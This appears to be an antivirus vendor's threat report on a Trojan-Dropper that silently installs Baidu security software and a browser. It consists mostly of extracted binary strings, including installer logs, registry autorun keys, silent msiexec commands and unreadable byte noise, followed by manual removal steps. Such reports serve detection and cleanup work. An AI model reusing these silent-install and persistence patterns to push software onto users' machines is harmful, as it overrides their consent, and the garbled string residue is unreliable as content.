http://ocsp.thawte.com0
.http://crl.thawte.com/ThawteTimestampingCA.crl0
http://ts-ocsp.ws.symantec.com07
http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
http://crl.verisign.com/pca3.crl0
https://www.verisign.com/cps0
#http://logo.verisign.com/vslogo.gif04
http://ocsp.verisign.com0>
Dhttp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
n.aAHu
2Terms of use at https://www.verisign.com/rpa (c)101.0,
2Beijing baidu Netcom science and technology co.ltd1>0<
2Beijing baidu Netcom science and technology co.ltd0
/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0;
/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0
https://www.verisign.com/cps0*
#http://crl.verisign.com/pca3-g5.crl04
http://ocsp.verisign.com0
BBB.DDD
Nullsoft Install System v2.46.5-Unicode
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
http://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
LOCALS~1\Temp\nsl9.tmp\tmppm4bkx.dll
\emaaif_70690.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp\tmppm4bkx.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp
\config.ini\..\emaaif_70690.exe"
Nullsoft Install System v2.46.5-Unicode
%Program Files%\Baidu\
sl9.tmp
File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp\tmppm4bkx.dll" (overwriteflag=1)
p\tmppm4bkx.dll"
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2.tmp\config.ini\..\emaaif_70690.exe"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2.tmp\config.ini\..\emaaif_70690.exe"
%Program Files%\Baidu\BaiduAn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2.tmp
emaaif_70690.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2.tmp\emaaif_70690.exe
67766137
1.0.284.627
BaiduSdSvc.exe_2716:

.text
`.rdata
@.data
.rsrc
@.reloc
c:\clientci\workspace\bdkv_v1.8_patch_compile\basic\KVOutput\binrelease\BaiduSdSvc.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDMBase.dll
BDMFrameWork.dll
?GetWindowsDirectory_DLL@BDMStringUtils@@YA_NPA_WH@Z
BDMStringUtils.dll
?BDMMsgGetModule@@YGJPAPAX@Z
BDMMsg.dll
BDMSkin.dll
KERNEL32.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
ADVAPI32.dll
MSVCP80.dll
SHLWAPI.dll
MSVCR80.dll
_amsg_exit
_crt_debugger_hook
USERENV.dll
WTSAPI32.dll
SensApi.dll
?BDMGetWindowsVersion@BDMMisc@@YAHAAKPA_WH@Z
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AVCRtpPluginContainer@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AVCRTPServer@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMLauchReportRecord@@
?"?*?0?6?
6 6$6(6,60646
5 5$5(5,5
@explorer.exe
\BDConfig.dll
winlogon.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
ntdll.dll
explorer.exe
BaiduSdTray.exe
"{0}\{1}" {2}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
EXPLORER.EXE
BaiduSdSvc.exe
Global\BDKVMutex{B2F10594-7119-4649-9326-AF1890C5CE56}
Global\BDKVEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}
Global\TAV_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
BaiduSd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
\bdkvrtpplugins\RtpContainerConfig.xml
C:\test.exe
d-d-d d:d:d d
d:d:d
%s(%d)
Last Error : %u(%s)
\BDMAVE.dll
Global\BDKVMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}
JoinBaiduCloundPlan
1.8.0.1250
BaidusdSvc.exe
BaiduSdTray.exe_2920:

.text
`.rdata
@.data
.rsrc
@.reloc
FtPhl
D$XPSSh
PSSSSSSh
c:\clientci\workspace\bdkv_v1.8_patch_compile\basic\KVOutput\binrelease\BaiduSdTray.pdb
BDMSkin.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
?BDMGetWindowsVersion@BDMMisc@@YAHAAKPA_WH@Z
BDMBase.dll
BDMFrameWork.dll
?GetWindowsDirectory_DLL@BDMStringUtils@@YA_NPA_WH@Z
BDMStringUtils.dll
?BDMMsgGetModule@@YGJPAPAX@Z
BDMMsg.dll
GetProcessHeap
SetProcessShutdownParameters
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
SHLWAPI.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
PSAPI.DLL
.?AVCBDMLauchReportRecord@@
2 2$2(2,20242
:(;-;3;_;
\BDConfig.dll
hh_debug:%s
BaiduSdUpdate.exe
Wtsapi32.dll
BDMgr.exe -stmd=6
BDMgr.exe -stmd=7
BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}
http://shadu.baidu.com/feedback.html
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
TrayPluginContainerConfig.xml
BaiduSdTray.exe
BDMNet.dll
ic_danger.png
errorcode: %d
BaiduSdBugRpt.exe
BaiduSd.exe
BaiduSdSvc.exe
Client.exe
\GameNoDisturb.ini
file='skin_1.png' xtiled='true' ytiled='true'
\BaiduSdSvc.exe -m "
\cmd.exe
Shell32.dll
\BaiduSd.exe
-selplugin=rdp_scan -vll=%s
BaiduSd{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
100012_1
CheckIco_Select_hor.png
CheckIco.png
ic_menu_logo_hor.png
CheckIco_hor.png
CheckIco_Select.png
MainIco_hor.png
ic_menu_logo.png
MainIco.png
menu.xml
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
1.8.0.1250
http://shadu.baidu.com
http://shadu.baidu.com/privacy.html
about.xml
@advapi32.dll
%u.%u.%u.%u
ABDKVMainframe.dll
BDCooly.dll
JoinBaiduCloundPlan
\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
BaidusdTray.exe
g.exe_3712:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
.UhhE
Kic`ca%u
msiexec /i vcredist.msi
3http://crl.microsoft.com/pki/crl/products/CSPCA.crl0H
,http://www.microsoft.com/pki/certs/CSPCA.crt0
3http://crl.microsoft.com/pki/crl/products/tspca.crl0H
,http://www.microsoft.com/pki/certs/tspca.crt0
http://microsoft.com0
SHLWAPI.dll
WS2_32.dll
BDLogicUtils.dll
NTDLL.DLL
MSVCP80.dll
MSVCR80.dll
WINMM.dll
imagehlp.dll
RegOpenKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
GetWindowsDirectoryA
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
%%%FGGG
CCC.CCCFCCC]CCCrCCC
BBB.DDD
Nullsoft Install System v2.46.5-Unicode
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
http://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
"%Program Files%\Baidu\BaiduAn\2.1.0.1214\vcredist_x86.exe" /q:a /c:"msiexec /i vcredist.msi /qn /l*v crt.log"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nstF.tmp\InstallHelper.dll
OFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}
adm\LOCALS~1\Temp\nstF.tmp\InstallHelper.dll
em v2.46.5-Unicode
2.0.50727.4053
setup.exe
vcredx86.ex
ADMQCMD
FINISHMSG
USRQCMD
: "%Program Files%\Baidu\BaiduAn\2.1.0.1214\vcredist_x86.exe" /q:a /c:"msiexec /i vcredist.msi /qn /l*v crt.log"
%Program Files%\Baidu\BaiduAn\
nstF.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nstF.tmp\file\*.*
Exec: success (""%Program Files%\Baidu\BaiduAn\2.1.0.1214\vcredist_x86.exe" /q:a /c:"msiexec /i vcredist.msi /qn /l*v crt.log"")
rogram Files\Baidu\BaiduAn\2.1.0.1214\vcredist_x86.exe" /q:a /c:"msiexec /i vcredist.msi /qn /l*v crt.log"
%Program Files%\Baidu\BaiduAn\install.log
1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp\g.exe"
0.0.0
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp\g.exe"
%Program Files%\Baidu\BaiduAn\2.1.0.1214
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp
g.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nstF.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp\g.exe
-1291189818
%Documents and Settings%\All Users\Desktop
%Documents and Settings%\All Users\Start Menu\Programs
%Program Files%\Baidu\BaiduAn
%Documents and Settings%\All Users
%Documents and Settings%\All Users\Application Data
1.0.0.524
BaiduSdUpdate.exe_664:

.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
11MyMutex_Install_{8F8594CD-13C7-452f-A2A8-0C1CF7D7F590}
c:\clientci\workspace\bdkv_v1.8_patch_compile\basic\KVOutput\binrelease\BaiduSdUpdate.pdb
?StartFadeInFadeOut@CBDMControlUI@BDMSkin@@UAEXEEKKHH@Z
?SetAlpha@CBDMContainerUI@BDMSkin@@UAEXE@Z
?SetAlpha@CBDMLabelUI@BDMSkin@@UAEXE@Z
BDMSkin.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
IMM32.dll
BDMTinyXml.dll
BDMBase.dll
BDMFrameWork.dll
BDMStringUtils.dll
?BDMMsgGetModule@@YGJPAPAX@Z
BDMMsg.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
MSVCP80.dll
SHLWAPI.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
PSAPI.DLL
.PB_W
.?AVCCmdLine@@
2/2X2
5$6(6,60646
0"0,0?0`0
4M4l4
4$4,484\4|4
01234567
\BDConfig.dll
ABDAVUPDATE_{E8D08AE7-4C2B-4a6b-A87B-70F19BC81CB0}
ABDAVUPDATE_{ADA8F091-D7BB-42c7-B19F-3B50395A90A7}
ABDAVUPDATE_{8006B824-2760-49dc-8FA1-57F7ADEB07D9}
\GameNoDisturb.ini
BaiduSdUpdate.exe
\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
file='kv_tips_success.png' dest='0,0,32,32'
file='kv_tips_warning.png' dest='0,0,32,32'
file='i.png' dest='0,0,32,32'
AVUpdateWnd.xml
question_icon.png
%d.%d
BaiduSd.exe
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
http://shadu.baidu.com/?from=19996
BaiduSdTray.exe
\bdmantivirus\kavupdate.dll
BDMUpdate.dll
106,59,300,89
199,5,301,40
118,59,300,89
130,59,300,89
84,0,0,0
file='kv_success.png' dest='0,0,64,64'
file='ic_danger.png' dest='0,0,64,64'
file='ic_warning.png' dest='0,0,64,64'
84,20,0,0
file='ScrollBar.png' source='0,0,10,32' corner='0,7,0,7'
file='ScrollBarBK.png' source='0,0,10,32' corner='0,7,0,7'
close_hot.png
close_pressed.png
smallbtn_hot.png
smallbtn_pressed.png
kv_success.png
ic_danger.png
bg.png
close-normal.png
close-hover.png
close-down.png
i.png
TipWnd.xml
/S /handle=%d /installmode=1
/S /handle=%d /installmode=1 /startmain=0
"{0}" {1}
d.d.d d:d
advapi32.dll
MsgId
bdmantivirus\kav_verify.dat
BaiduSdSvc.exe
%u.%u.%u.%u
file='skin_1.png' xtiled='true' ytiled='true'
1.8.0.1250
BDAVUpdate.dll
vcredist_x86.exe_2132:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
COMCTL32.dll
VERSION.dll
advapi32.dll
advpack.dll
wininit.ini
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupx.dll
IXPd.TMP
TMP4351$.TMP
FINISHMSG
USRQCMD
ADMQCMD
msdownld.tmp
wextract.pdb
PSSSSSSh
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
GetWindowsDirectoryA
ExitWindowsEx
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
msiexec /i vcredist.msi /qn /l*v crt.log
33333330
3333333
33333333
vcredist.msi
vcredis1.cab
V-[C.Yx
%u/8f
63738393:3
/Vx.bV
YudP "#v
~O.WG#(
I?%uIH
(>.oK
.TZ]V/tf
L2|).bp
%s@0z
.UPjk
^".Gef
.Oek$
,*%D^
-Y}\T
.QM%#
*.Ffs
.dI>!O~
|%uTo
.Ja#Lkx]
.nip,}_
EF%fq
1kq.Lh
[email protected]
_6]Q.xO
.vE"G.
.Ts2b
.XQ>
Pv}%dI
r.Jq2
y?.Uz
2IC~H%d
2X.zS
JtCP
!oPS.MV
Bp%dM
.JB:Y
.ZdTn
oGJ%d
.Qzg_
un[.AGm9
M.Pl_F,
rF.lj
xF.oG
~VQEI%x
**k%sS
%uziu
//.Byv
.nd1O
4%x6F
F[.lv ?
%SNmL
G%s?*x
4N.bx
dxV%U
M.xjt
K1%C
0F%c;v
d.Chj
.SA.Q&
s1v%D
.drO
.NYQo
3-.uP
8.ct%
mØ!*]
$5N.Mk
i%fh)'
%d^ ,w
%s\$kxZ
.BIkm
.bzgF
/F%Xd;
.Iq7P
hh.gv
7l.nR
a.qaPl
3.wBG
ij.WF
.kQ6rm
.Ew\[
.Eanq
R[.yv8
.pbg'<
#m.Bu
iw.on}
.jDgSUp
=.dw#Q
^.sEw
R %x_
YjGYQ.cg
.BIB}
#]%7s
t]%uEA%
.tlre
8;.jz
kX.drc#z
%U{x-o
!.lq{
=lQQ%F
5}{.LB
.lCA!
.xS)@
.WmSO
.IJ:1Nu
ZvfAPT%F
b%Xt[
is9%d
EBl%C
jExE
xP.JR>^\
R'ÌX-
.zHY|
h.lt@
%s3iu
s-.Lc
m#.Nn
.Iinx
z*h%f
gE.jE?
cMDV
%$.MZ
EF.kJ
hk¬mD
.SohRP
H%XJx
B&%U:
cXP%d
.eQyGi
..Di/
N#z.Mi
5W -H}
.La(K
Z66n%X
%D=>p
I.ByeK
&x.yQ
,7.wC
N,.gl
a'.AjXH
msgN"[
i%clu
9.rj*D
H3.ma
3.Dbwe
/p2%c
-py7C}4
b\j.Amjz
.wiu6
.TIQ%E
f%Csn
.Bf09
2.US\
.taT*mt
%xs*r
.mKx:
<-&%f
.oWF=
@(.Op
F.gdJ
dB%cI
O^.FG
Z/5.HD
%x sO
.jZwn
XM%sN,
c3.eP
.kC=5
D.AT_
@5.tz
5>.vE]J<
eQssh
|.%s]
.FlI(
S~[%u
/W.gb
.MB,:H
.mx^$
o,.iI
1.cA^?52
a%XuA
x%fZf!
Oc.va
=(=.=7<;<
f:$h}%C
j*Ub.aF
eTCP
65%UZ
x.EDi
.LD [
]%a%e%i%m%q%u%*#
.!.%.).-.1/5
<[.JR^
sEn%D
.hL*d
s{%UW
.Ipztl
Ud%uP
z.AeO8
WB%uKg
F.lC(
BH|%F
>/.UI1M
.MOtz
.DP:=1
V_ÿ
&x.fJ
&&.rr
#].tpe
v.my~
V:.ZT
vm.vpR,
H.XBR~
C~{Ih#.zK_e
XÎ7
?\S%Ck
G` %C
.bTu5
{=.VI
>a.kW
P.Vwd
.HtGM
;GXc.AV
.ab,h
<.gu-
R.EmgNr
.UhhE
Kic`ca%u
msiexec /i vcredist.msi
Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.
CFailed to get disk space information from: %s.
System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?
8Unable to retrieve operating system version information.!Memory allocation request failed.
Filetable full.Ên not change to destination folder.
Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.
(Error creating process <%s>. Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.
Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install
Could not create folder '%s'
To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.
Error retrieving Windows folder
$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .
System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.
/C: -- Override Install Command defined by author.
eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?
Could not find the file: %s.
:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.
2.0.50727.4053
setup.exe
services.exe_764_rwx_00040000_00001000:

%Program Files%\Baidu\BaiduSd\1.8.0.1255\bd0001.dll
svchost.exe_1088_rwx_02D70000_00001000:

%Program Files%\Baidu\BaiduSd\1.8.0.1255\bd0001.dll

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.

Update the definition files.

Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.

Terminate malicious process(es) (How to End a Process With the Task Manager):

BaiduSd.exe:3596
shandian.exe:1588
shandian.exe:476
F30241_s_0523.exe:1072
BaiduSdTray.exe:2920
bddownloader.exe:3304
regsvr32.exe:3556
BaiduSdSvc.exe:2716
BaiduSdSvc.exe:2612
netsh.exe:3540
BDKVWsc.exe:2976
RegSvr32.exe:3024
RegSvr32.exe:3316
BDDownloader.exe:2896
BDDownloader.exe:2700

Delete the original Trojan-Dropper file.

Delete or disinfect the following files created/modified by the Trojan-Dropper:

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140527160745_754[1].jpg (1826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\hotdata[1].js (992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\subnav_v41[1].png (634 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (1879 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\favicon[1].ico (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\icon4[1].gif (1 bytes)
%Program Files%\shandian\bin\twcache.ini (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\20130830161205_609[1].gif (2789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\v53_2icos[1].gif (2 bytes)
%Program Files%\shandian\bin\ImgCache\123.sogou.com_favicon.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\20130820165531_481[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\v53_123n[2].js (2192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\20140508103513_537[1].gif (4179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\guide_tip[1].png (1012 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\newioage[1].css (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140526163043_207[1].jpg (186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\i8g7XZO1lz1162[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\foot_slider[1].jpg (322 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX3.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\ufo2[2].js (11043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\citydata[1].js (2933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\ufo2[1].js (12131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\123.sogou[1].htm (19620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\skin_tips_n1[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\logo_1112293[1].gif (1266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\fbg_about[1].png (634 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\welcome_cn[1].htm (1469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\v53_123n[1].js (3215 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\get_123_v53[1].php (7789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cloudy[1].gif (1 bytes)
%Program Files%\shandian\bin\shandian.ini.tmp (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\start_button[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\_ads_2[1].js (3 bytes)
%Program Files%\shandian\bin\theworld.ac (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\get_tj[1].php (1020 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\v53_bicos[1].gif (826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\selogo_111207[1].png (1960 bytes)
